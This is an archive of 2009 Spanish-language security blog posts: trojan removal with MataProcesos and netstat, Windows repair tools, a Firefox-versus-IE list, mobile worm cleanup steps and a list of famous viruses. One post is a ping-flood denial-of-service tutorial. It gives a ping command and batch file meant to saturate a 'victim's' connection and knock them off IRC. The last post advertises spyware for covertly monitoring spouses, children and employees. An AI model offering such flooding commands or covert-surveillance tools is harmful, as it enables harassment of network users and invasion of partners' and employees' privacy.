Para librarnos de ellos para siempre leamos los siguientes puntos...
Aclaraciones:
Para que el MataProcesos funcione hace falta tener instalados los 'runtimes' de Visual Basic 5. Si no los tenés los podés conseguir en:
ftp://ftp.simtel.net/pub/simtelnet/win95/dll/vb500a.zip
o en el mirror: ftp://ftp.cdrom.com/pub/simtelnet/win95/dll/vb500a.zip
2) Mataprocesos y Netstat, suficiente para erradicar cualquier troyano
Existe una aplicación llamada Netstat, y está ubicada en C:\WINDOWS. Con ella y la ayuda del MataProcesos podemos limpiar nuestra PC de troyanos.
Para hacerlo correctamente hay que seguir los siguientes pasos:
a) Nos desconectamos de Internet
b) Cerramos todas las aplicaciones que utilicen conexiones a Internet, por ejemplo: ICQ - Internet Explorer o Netscape - GetRight - Go!Zilla - Telnet - mIRC - MSChat - Outlook - Outlook Express - etc...
c) Ejecutamos el MataProcesos
d) Ejecutamos una ventana de DOS
e) En la línea de comandos del DOS tecleamos "netstat -a" y tomamos nota de todos los "puertos" que aparecen como "abiertos", estos aparecen en la columna "Dirección local" con el formato: :
Por ejemplo, podríamos tener el siguiente listado:
Proto Dirección local Dirección remota Estado
TCP Donatien:6711 0.0.0.0:0 LISTENING
TCP Donatien:6776 0.0.0.0:0 LISTENING
TCP Donatien:30100 0.0.0.0:0 LISTENING
TCP Donatien:30101 0.0.0.0:0 LISTENING
TCP Donatien:30102 0.0.0.0:0 LISTENING
TCP Donatien:1243 0.0.0.0:0 LISTENING
TCP Donatien:1035 0.0.0.0:0 LISTENING
UDP Donatien:1035 *:*

fin de la segunda parte

Como librarse de un troyano?(primera parte)

2009-09-18T11:18:00.000+02:00

En esta post vamos a hablar de Mataprocesos, como es muy largo lo dividire en 3 partes

Este pequeño programa, (hecho cuando comenzó el furor del Back Orifice) se llama "MataProcesos" y es una pequeña utilidad que cumple la función que debería estar incluída en la ventana de CTRL-ALT-DEL. Curiosamente esta utilidad tan "pequeña" (ocupa 40 Kb y cumple una tarea muy sencilla) nos será de enorme ayuda con el tema de la seguridad.

Cuando uno ejecuta el MataProcesos un icono (una señal de STOP) se coloca en la barra de tareas. si queremos cerrar un programa rapidamente (alguno que se colgó, o de esos que no aparecen en el CTR-ALT-DEL, como por ejemplo UN BACKDOOR como el patch del NetBus, si es que algun "vivo" nos lo metió) haremos doble click en el STOP y se abrirá una ventana con un listado de todos los procesos reales que se están ejecutando en el momento, listados por nombre de archivo ejecutable.

Para cerrar (matar) un proceso, basta con hacer doble click en el item de la lista que lo representa, y responder que SI a la pregunta que MataProcesos nos hace cuando pide la confirmación.

Notemos que dije que con MataProcesos podemos matar a "todos los procesos", lo cual incluye también a los procesos vitales del Windows, por lo que la primera vez, por falta de experiencia, podriamos "matar" al Windows mismo, obligándonos a reiniciar el ordenador.

Este programa es útil, por ejemplo, si estamos siendo víctima de un troyano, es decir, alguien nos está "molestando", mostrando mensajes extraños en nuestra pantalla sin nuestra autorización, mostrandonos imágenes y abriendo y cerrando la bandeja de nuestro CD-ROM...

Usando el MataProcesos para sacarnos de un apuro

En ese caso, estamos frente a un auténtico "Lamer" (que vendría a ser algo así como un tonto que quiere ser Hacker y utiliza programas como el NetBus, Back Orifice, Sub Seven, Donald Dick o NetSphere para asustar o abusarse de los que no saben). ¿Cómo llegó hasta aquí este individuo? El, u otro similar a él, nos pasó un archivo EXE o SCR haciendonos creer que se trataba de algo muy interesante, y cuando (incautos) lo ejecutamos... probablemente no pasó nada, o algo no muy interesante que digamos... Pero en realidad lo que ocurrió fué que acabamos de instalar un "control remoto" para que este "Lamer" pueda controlar nuestro sistema a su antojo. Fuimos vilmente engañados. Ejecutamos, sin saberlo, un troyano.

Tenemos que apurarnos a quitarnoslo de encima, porque por el momento también tiene acceso a nuestros archivos, para robarlos o borrarlos.

El modo de usar el MataProcesos en este caso sería simplemente seleccionar el proceso adecuado (el del troyano) y terminarlo.

Cómo reconocemos al troyano? Bueno, suponiendo que la lista que MataProcesos nos muestra es la siguiente:

C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSVR32.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\WINDOWS\PATCH.EXE
C:\WINDOWS\WINDOW.EXE
C:\WINDOWS\SYSTEM\ .EXE
C:\WINDOWS\SYSTEM\NSSX.EXE
C:\WINDOWS\RNAAPP.EXE
C:\WINDOWS\TAPISVR.EXE
C:\ARCHIVOS DE PROGRAMA\ICQ\ICQ.EXE
C:\ARCHIVOS DE PROGRAMA\OUTLOOK EXPRESS\MSIMN.EXE
C:\ARCHIVOS DE PROGRAMA\MATAPROCESOS\MATAPROCESOS.EXE

En este caso nos encontramos con un ordenador LLENO DE TROYANOS, es decir, su seguridad ha sido totalmente violada. ¿Cómo nos damos cuenta de eso?

Hace falta estar acostumbrado al MataProcesos, en otras palabras, saber el proceso que cada archivo está ejecutando.

Fin de la primera parte.

Ataques D.o.S a base de pings

2009-09-17T16:58:00.000+02:00

Bueno en est post pondre lo que es un ataque a D.O.S(de las siglas en inglés Denial of Service)

En seguridad informática, un ataque de denegación de servicio, también llamado ataque DoS,esta claro que lo dejo a su responsabilidad hacerlo.Esto fue lo que durante un tiempo dejo de
funcionar twitter.
Bien, hoy vamos a aprender, a como saturar un modem, a base de pings.
Vamos al tema.

Una aclaración antes de todo, esto ya no funciona en el 80% de los casos, pero he pensado que por saber mas o menos como se realiza un ataque D.o.S, que no falte.

Un ping es un tipo de mensaje ICMP, que se usa para ver si una máquina se encuentra operativa y accesible.
El procedimiento es enviarle un ping a la máquina; ésta lo recibe y contesta. Al recibir la contestación ya sabemos que la máquina vive. Si no se recibe en un plazo dado se considera como no accesible (la máquina podría estar apagada, o todos los "caminos" en la red hacia ella cortados).
La manera de usar esto de forma ofensiva consiste en mandar más pings a un usuario de los que su máquina pueda contestar, saturándole su conexión a Internet.

Los paquetes que se envían al hacer ping son típicamente muy pequeños. Con el modificador -s estamos forzando un nuevo tamaño (32000 bytes es aceptable; también podés probar con 64000).
Pensad: un modem de 28.8 tardará unos 18 segs. en recibir 64 Kbytes (sin considerar compresión), mientras que desde nuestra shell lo hemos mandado en ¡¡décimas de segundo!! Si consideramos además que el comando ping manda más de un paquete (los que queramos) ... ¡boom! Tendréis el módem de vuestra víctima trabajando a toda pastilla para nada y fastidiándole todo lo que esté haciendo. En particular, le estropearéis su conexión al IRC: en el mejor de los casos la víctima tendrá un lag horroroso y en el peor será expulsada del servidor por "ping time-out".
Desgraciadamente la solución para evitar este ataque no suele ser fácil ya que no se trata de un bug que se pueda parchear sino de la propia mecánica de los protocolos TCP/IP. Lo único que se puede hacer es rogar que nuestra máquina sea más potente que la de nuestro enemigo.

Manos a la masa

La sintaxis es:

ping -l 64000 "IP o HOST" -t

-l 64000 significa el tamaño del paquete y -t es para que mande paquetes infinitos hasta saturar el servidor.

Para comprobar que está surtiendo efecto, solo hace falta hacer un ping normal, a esa misma ip o host.
Si no la devuelve, quiere decir que está saturada devolviendo grandiosos paquetes.

Para ser más eficaz, y no teclear constantemente esa sintáxis, podemos crear un batch:
En mi caso, la sintaxis sería

@echo off
ping -l 64000 192.168.1.5 -t
echo

Fuente:http://foro.eduhack.es/hacking-avanzado/tutorial-ataques-d-o-s-a-base-de-pings/

Arregla tu Pc sin formatear..... repara xp

2009-09-15T17:11:00.000+02:00

Evita formatear tu windows cuando tengas problemas

Con este rar de tan solo 385 kb podes reparar tu Windows dañado ya sea por virus, spyware ,afines y/o problemas de registro.
1- Una compilacion de archivos reg, vbs para corregir este tipo de errores de registro y de windows en gral.
-Reparar asociacion avi.reg
-Reparar asociacion cab.reg
-Reparar asociacion carpetas.reg
-Reparar asociacion eml.reg
-Reparar asociacion exe.reg
-Reparar asociacion hta.reg
-Reparar asociacion ico.reg
-Reparar asociacion lnk.reg
-Reparar asociacion msi.reg
-Reparar asociacion reg.reg
-Reparar asociacion sys.reg
-Reparar iconos de menu inicio, ayuda .vbs
-Reparar vista previa d imagenes.vbs
-Reparar modo seguro.reg
-Reparar restaura sistema.reg
-Repaar xp thumbnail.exe

Si tenes otro problemas proba estos 2 programas incluidos en el rar.
2- Regunlocker
# Elimina las restricciones del Sistema
* Reactiva el acceso al registro
* Desbloquea el administrador de tareas
* Desbloquea la consola de Windows
# Elimina las restricciones del Explorador
* Reactiva el botón Ejecutar…
* Reactiva el botón de Apagado e Inicio de Sesión
* Reactiva la Bandeja de Sistema
# Repara la visualización de archivos ocultos
# Libera la página de Inicio de Internet Explorer
# Desbloquea el fondo de pantalla del escritorio de Windows
# Repara el Modo Seguro (Modo a prueba de fallos

3- Dial-a-fix-v0.60.0.24,
Dial-a-fix. Una sencilla aplicación, gratuita, sin mucho misterio, que
repara aquellas fallas que Windows comienza a tener luego del ataque de
algún malware, virus, una instalación defectuosa o, simplemente, del
uso por parte de nuestra pequeña sobrina. Algunos de estos problemas
podían llegar a requerir la reinstalación del sistema operativo, paso
por demás tedioso y largo, y no lo suficientemente amigable como para
que lo afronte cualquier usuario. Pero con Dial-a-fix de por medio, ya
no.
¿Cómo funciona?
Al descargarlo, nos quedan dos archivos en una carpeta. Ejecutamos
Dial-a-fix.exe para abrirlo; el otro ejecutable lo usa el mismo
programa durante las reparaciones. Ahora, repasemos cada categoría por
separado y expliquemos de qué la van:
1) Prep
La limpieza de temporales nunca está de más, pero no es algo que
solucione nada. En cambio, ajustar la fecha y la hora es necesario para
ciertas páginas de Internet que chequean este dato antes de permitirnos
interactuar con ella.
2) MSI
Nada que ver con la empresa que fabrica componentes de hardware. Esta
sección arregla los conflictos que tengamos con el instalador de
Windows (Windows Installer). Por ejemplo, cuando no se nos permite
instalar nada alegando que no puede tener acceso a él o estamos en
Windows en Modo Seguro (o “A prueba de fallos”, como se suele decir por
tradición).
3) WU / WUAU
Ciertos virus pueden hasta “deshabilitar” ciertas páginas de Internet
para que no podamos ingresar en ellas, como ocurre con el sitio de
actualización y parches de Windows. Este apartado soluciona éstos y
otros problemas relacionados a Windows Update, funcionalidad
imprescindible para mantener el sistema al día.

4) SSL / HTTPS / Cryptography
Si tenemos inconvenientes a la hora de interactuar con páginas que usen
protocolos de seguridad (SSL o HTTPS), como es el caso de Gmail, desde
aquí quedarán solucionados. Por lo menos, aquellos casos que estén
contemplados por este programa.
5) Registration Center

Así que el Windows Media Player les tira un error al iniciar? ¿Y qué me
dicen de la función Restaurar Sistema, que no muestra sino una simple
ventana en blanco? Increíble que éstos y muchos otros problemas se
solucionen “registrando” archivos DLL en el sistema. Y éste es el lugar
para hacerlo. No por nada se llama “centro de registración”, ¿eh?.
Una vez tildada la/s categoría/s en la que encaja nuestro problema,
apretamos el botón Go y esperamos que nos muestre la leyenda Ready en
la parte inferior. En el caso del apartado Registration Center, si
tenemos duda sobre cuál de las opciones tildar, tranquilamente podemos
escoger todas. No habrá repercusiones por seleccionar alguna de más.
Adicionalmente, y sólo si nuestro Windows tiene más agujeros que
colador, tenemos el botón con forma de tilde verde, que selecciona
todas las categorías para reparar. La cruz roja, en cambio, elimina
toda selección hecha.
Lo último: el botón Policies muestra una ventana con valores del
Registro que fueron alterados para deshabilitar o no permitir ciertas
acciones o accesos al usuario. Es decir, el programa escanea políticas
de restricciones. Si encuentra alguna, el botón Remove se encargará de
hacer justicia.
Evita formatear tu windows cuando tengas problemas

descarga:

21 razones de porqué Firefox es bueno

2009-09-14T12:06:00.000+02:00

Hay muchas razones para usar Firefox y para decir que es buen navegador. En esta ocasión nos centraremos en enumerar 21 razones por las que Firefox supera a Internet Explorer:

1. No tiene WGA – Firefox no comprobará tu Sistema Operativo para saber si usas uno original o no.

2. Se puede instalan en cualquier sitio – si no eres seguidor de Bill Gates, puedes instalar Firefox. ( soportado por linux)

3. Libre - no te costará nada instalarlo, es gratis. Para instalar IE necesitarás una copia genuina del OS.

4. Utilidad pequeña - Grandes características y funcionalidades que ocupan poco espacio. (aproximadamente 5 mb)

5. Funciona en unidades extraibles - Firefox no se limita a correr desde donde lo instalas, puedes utilizar firefox en un disco extraible.

6. Control total de la instalación - puedes detener la instalación brevemente, pararla, y controlar las descargas directas a través de su panel de descargas directas.

7. Recuperar pestaña cerrada – Firefox guarda la pestaña recién cerrada, y puedes recuperarla si la cerraste accidentalmente.

8. Recuperar sesiones - Al iniciar Firefox, puedes recuperar las sesiones anteriores.

9. El mejor Anti-phishing - IE7 y Firefox2 incluyen la característica anti-phishing, pero son mejores las de Firefox2. Ver aquí….

10. Protección contra Spyware - Firefox no permitirá que se instale ningún software sin tu consentimiento.

11. Aislamiento - una característica muy provechosa de Firefox es que puedes borrar tus datos confidenciales incluyendo lo que escribiste en formularios, historial y otros datos cuando sales de Firefox.

12. Corrector ortográfico incorporado - Firefox tiene un corrector ortográfico incorporado, que comprueba tu E-mail o tu entrada de blog para saber si has cometido errores.

13. Reportar Phising - si encuentras una web falsa (phising), puedes utilizar el navegador firefox para reportarla.

14. Añade a favoritos todas las pestañas - puedes añadir a tus favoritos fácilmente todas las pestañas si están relacionadas unas con otras. Lo mismo puedes abrir a la vez todos los favoritos que estén en la misma carpeta.

15. El amarillo significa seguro - Firefox coloreará de amarillo una dirección URL segura. (IE7 sola muestra un icono de un candado)

16. Barra inteligente de dirección - si escribes accidentalmente tu consulta de búaqueda en la dirección de URL en lugar del cuadro de búsqueda, Firefox inteligente no te devolverá un error, sino que realizará tu consulta dorectamente a Google.

17. Atajos del ratón - aparte de los atajos del teclado, Firefox también tiene atajos para el ratón.

18. Página Info - Firefox incluye una característica que puede enseñarte toda la información sobre la página actual.

19. Enlace al email - si deseas enviar un enlace a un amigo, puedes utilizar Firefox para enviar un email a tus amigos, y también puedes incluir algunos comentarios.

20. Veteranos contra el novato - la primera versión del IE se lanzó en agosto de 1995, la primera versión de Opera salió a la luz en 1996, mientras que Firefox se lanzó en septiembre de 2002. Esto significa que Firefox es grande en su juventud.

21. Open Source- El código abierto significa que millones de mentes pueden trabajar juntas para mejorar el navegador.

Artículo original: 21 Reasons Why Firefox Is Great (Beats IE7 Hands Down)

¿Como detectar quien me piratea la señal wifi?

2009-09-14T11:58:00.000+02:00

hola, bueno hay un programa que es muy facil de usar , Colasoft MAC Scanner este programa te permite ver quienes se conetan a tu wifi pero solo eso, os dejo otro programa que detecta si alguien está utilizando nuestro ancho de banda y, tras ello, enviarle mensajes de alerta para indicarselo e invitarle a que abandone tu preciada red. Puedes descargar Airsnare, un programa gratuito para windows que busca la presencia de intrusos inalambricos, informa de quiénes son, muestra su actividad y les envía advertecias.

Virus para Moviles

2009-09-11T12:19:00.000+02:00

tipo: virus-gusano
so : Symbian

Cabir es, concretamente, un gusano que utiliza las señales bluetooth, y ya se ha expandido por 20 países. Reduce drásticamente la potencia de los teléfonos infectados, y las variantes más dañinas pueden desactivar el terminal, que debe ser reiniciado en un establecimiento especializado.

Cabir se propaga en forma de un archivo llamado Caribe.sis, que se instala automáticamente en el sistema cuando el usuario acepta la transmisión,El virus vuelve a ejecutarse desde otra ubicación, y el teléfono es reiniciado. Igualmente, el virus se ejecutará cuando el teléfono sea encendido, y seguirá activo a pesar de que sea borrado del directorio APPS.

*DESINFECCION:

Para remover el gusano de un equipo infectado, se deberá instalar un administrador de archivos y habilitar la opción para ver archivos en el directorio de sistema.

Luego, buscar en unidades de la A: a la Y: directorios de nombre \System\Apps\Caribe. Una vez encontrado deben ser eliminados los siguientes archivos:

Caribe.App
Caribe.Rsc
Flo.Mdl

Buscar también el directorio \System\Symbiansecuredata\Caribesecuritymanager y eliminar allí los archivos:

Caribe.App
Caribe.Rsc
Caribe.Sis

Bajo el directorio \System\Recogs eliminar el archivo Flo.Mdl.

Dado que el archivo Caribe.Rsc no puede ser eliminado mientras se esté ejecutando, se deberán eliminar todos los otros archivos, luego reiniciar el equipo y por último eliminar dicho archivo.

Finalmente, eliminar el archivo Caribe.Sis del directorio \System\Installs.
--------------------------------------------------------------------------------------
tipo: virus-gusano
so : Symbian

Este gusano poseé las mismas caracteristicas que el cabir pero puede reproducirse por
SMS, MMS, MMS y mandar datos como texto, videos, imagenes etc.
Es el primer gusano con esta capacidad

En algunos modelos de teléfonos, el gusano cambia el logo de la operadora telefónica, por uno propio con el siguiente texto:

Infected by Commwarrior

El gusano tambien puede abrir una página Web con el navegador del celular

modelos afectados:

----Symbian OS Series 60----

Nokia 3650, 3600
Nokia 3660, 3620
Nokia 6600
Nokia 6620
Nokia 7610
Nokia 7650
Nokia N-Gage
Panasonic X700
Sendo X
Siemens SX1

*DESINFECCION:

Eliminación manual

Para eliminar el gusano de un dispositivo infectado, sigue estos pasos:

1. Selecciona la opción "CommWarrior" de la lista de aplicaciones.

2. Selecciona "Cancel" (Exit CommWarrior?) y confirma con "Yes".

3. Borra la carpeta "CommWarrior" utilizando el manejador de archivos (file manager):

C:\system\apps\CommWarrior\

Aunque el sistema por defecto se instala en la unidad C, esto puede cambiar en algunos casos.

Si no puedes borrar estos archivos, apaga y vuelva a encender tu dispositivo.
---------------------------------------------------------------------------
tipo: troyano
so : Symbian

Doomboot es un troyano que al ejecutarlo automaticamente se descarga el gusano Commwarrior
Doomboot provoca que los teléfonos no se reinicien como debe. Esta diversidad de efectos virales dañan a los usuarios de smartphones de la serie 60 de Symbian, especialmente a los usuarios que utilizan juegos piratas.

Doomboot provoca que el teléfono no pueda reiniciar y Commwarrior provoca tráfico Bluetooth que hace que el teléfono se quede sin bateria en menos de una hora. Si alguien se infecta de Doomboot tiene menos de una hora para darse cuenta y desinfetcarse, de lo contrario perderá todos sus datos

Doomboot puede distribuirse de dos formas, por mensajes MMS y por menajes Bluetooth

*DESINFECCION:

1. Elimina los siguientes ficheros que localizarás en las ubicaciones indicadas:

* C:\Etel.dll
* C:\etelmm.dll
* C:\etelpckt.dll
* C:\etelsat.dll
* C:\system\apps\Cabir AA detected\Cabir AA detected EVS is disinfecting re-boot your phone.rsc - 0 bytes
* C:\system\apps\Cabir AA detected\Cabir AA detected EVS is disinfecting re-boot your phone.MBM - 0 bytes
* C:\system\apps\Cabir AA detected\Cabir AA detected EVS is disinfecting re-boot your phone.app - 0 bytes
* C:\system\apps\Cabir AA detected\Cabir AA detected EVS is disinfecting re-boot your phone.app - 0 bytes
* C:\system\apps\EVS\EVS.aif - 3,245 bytes
* C:\system\apps\EVS\EVS.app - 30,368 bytes
* C:\system\apps\EVS\EVS.rsc - 671 bytes
* C:\system\apps\EVS\EVS_caption.rsc - 60 bytes
* C:\system\apps\EVS\exovirusstop.mbm - 3,961 bytes
* C:\system\apps\velasco\marcos.mdl - 0 bytes
* C:\system\apps\velasco\velasco.app - 0 bytes
* C:\system\apps\velasco\velasco.rsc - 0 bytes

2. Reinicia tu terminal y explora todo la unidad C: con un antivirus para asegurarte de la eliminación del troyano.
------------------------------------------------------------
tipo: troyano
so : Symbian

Askudoo fecta a dispositivos móviles y opera sobre dispositivos con plataforma Windows CE, J2ME, Symbian, iPhone, Blackberry o Android. Puede ser recibido a través de MMS, vía Bluetooth o descargado a través de páginas web.

es un troyano diseñado para dispositivos móviles, que llegando bajo una apariencia inofensiva, permite en realidad llevar a cabo intrusiones y ataques contra el mismo.

Skudoo no se propaga automáticamente por sus propios medios, pero puede ser recibido a través de mensajes MMS, Bluetooth o ser descargado desde sitios web con contenido malicioso.

-----------------------------------------------

tipo: troyano
so : Symbian

skulls es un troyano que se camuflagea con el nombre Extended Theme Manager,
induce al usuario a creer que al ejecutarlo podrá crear sus propios temas en su teléfono móvil. Sin embargo, Skulls cambia todos los íconos del teléfono con imágenes de calaveras.

-------------------------------------------------------------
tipo: troyano
so : Symbian

skulls es un troyano que se camuflagea con el nombre Extended Theme Manager,
induce al usuario a creer que al ejecutarlo podrá crear sus propios temas en su teléfono móvil. Sin embargo, Skulls cambia todos los íconos del teléfono con imágenes de calaveras.
Asimismo, las aplicaciones instaladas en el teléfono no pueden ser usadas una vez que Skulls se ha ejecutado.
Skulls se ha propagado mediante sitios de shareware para teléfonos Symbian.

*DESINFECCION:

Para remover el gusano de un equipo infectado, se deberá instalar un administrador de archivos y habilitar la opción para ver archivos en el directorio de sistema.

1. Ir a c:\System\apps\appinst y borrar
c:\System\apps\appinst
c:\System\apps\menu
c:\System\apps\mce
2. Abre el menú de aplicaciones
3. Busca navegador web
4. Descargar F-Secure Mobile Anti-Virus para su dispositivo
http://www.f-secure.com/wireless/download/
o con el propio móvil: http://mobile.f-secure.com
5. Instale F-Secure Mobile Anti-Virus
6. Inicie F-Secure móvil Anti-Virus
7. Analice su dispositivo para eliminar los archivos que se usan para bloquear el sistema de aplicaciones críticas
8. Ir al gestor de aplicaciones
9. Desinstalar "Extended Theme.sis"

Los virus más peligrosos, famosos, dañinos de la historia

2009-09-11T12:13:00.001+02:00

W95/CIH (1998)
Es conocido como CIH 1003 y como Chernobyl, su fecha de activación y esta denominación hacen referencia al accidente nuclear en esta central.
Origen: Taiwan.
Daños: Más de 80 millones de dólares, pérdida incalculable de iinformación. Me incluyo en la lista.

Melissa (1999)
Atacó a miles de usuarios y empresas el 26 de Marzo de 1999, después de haber sido esparcido como un documento de MS-Word infectado en un grupo de noticias de Usenet, que conformaban una lista de interés sobre páginas web porno.
Origen: EEUU.
Daños: Entre 300 y 600 millones de dólares en pérdidas sólo en su país de origen.

I Love you (2000)
Fue detectado el Jueves 4 de mayo de 2000 cuando infecto a miles de ordenadores en todo el mundo. Este código ha sido considerado como uno de los más rápidos de todos los tiempos en propagarse e infectar ordenadores.
Origen: Hong Kong.
Daños: De 10 a 15 billones de dólares.

Code Red (2001)
Un gusano que aprovecha una vulnerabilidad en un componente del Index Server de Microsoft, ha llegado a comprometer la seguridad de cerca de 30000 servidores Windows en todo el mundo, según reportes de consultoras de seguridad informática.
Origen: Aún no determinado.
Daños: De 10 a 15 billones de dólares.

SQL Slammer (2002)
Infecta principalmente a equipos con Microsoft SQL Server, actualmente es uno de los programas o sistemas más utilizados para realizar tareas
relacionadas con registros y bases de datos.
Origen: Aún no determinado.
Daños: No muy fuerte dado que aparecio un fin de semana.

Blaster (2003)
Atacaba básicamente el sitio de Microsoft. Este gusano se propagó rápidamente a través de computadoras con Windows 2000 y XP.
Origen: EEUU.
Daños: Más de 10 billones de dólares.

Sobig (2003)
Es un gusano que se extiende a través de email y de unidades compartidas de red.
Origen: Aún no determinado.
Daños: De 5 a 10 billones de dólares.

Bagle (2004)
Es un virus que se propaga de forma masiva a través del correo electrónico y contiene un componente de acceso remoto.
Origen: Aún no determinado.
Daños: Decenas de billones de dólares y aún sumando.

MyDoom (2004)
Gusano que se propaga a través del correo electrónico en un mensaje con características variables y a través del programa de ficheros compartidos (P2P) KaZaA.
Origen: Aún no determinado.
Daños: LLego a reducir el desempeño de Internet en 10% y el tiempo de carga de de la WWW en 50% por varias horas.

Sasser (2004)
Gusano que para propagarse a otros equipos, aprovecha la vulnerabilidad en el proceso LSASS (Local Security Authority Subsystem). Sólo afecta a equipos Windows 2000/XP y Windows Server 2003 sin actualizar.
Origen: Alemania
Daños: Decenas de millones de dólares.

Real Spy Monitor 2.86 Full

2009-09-10T15:49:00.000+02:00

Preocupado por la forma en que su PC se está utilizando? Quiere mantener las pestañas sobre sus hijos, cónyuge, los empleados? Necesidad de prevenir que sus hijos o empleado de alguna aplicación o los sitios web? Real Spy Monitor es la solución para usted.

descarga: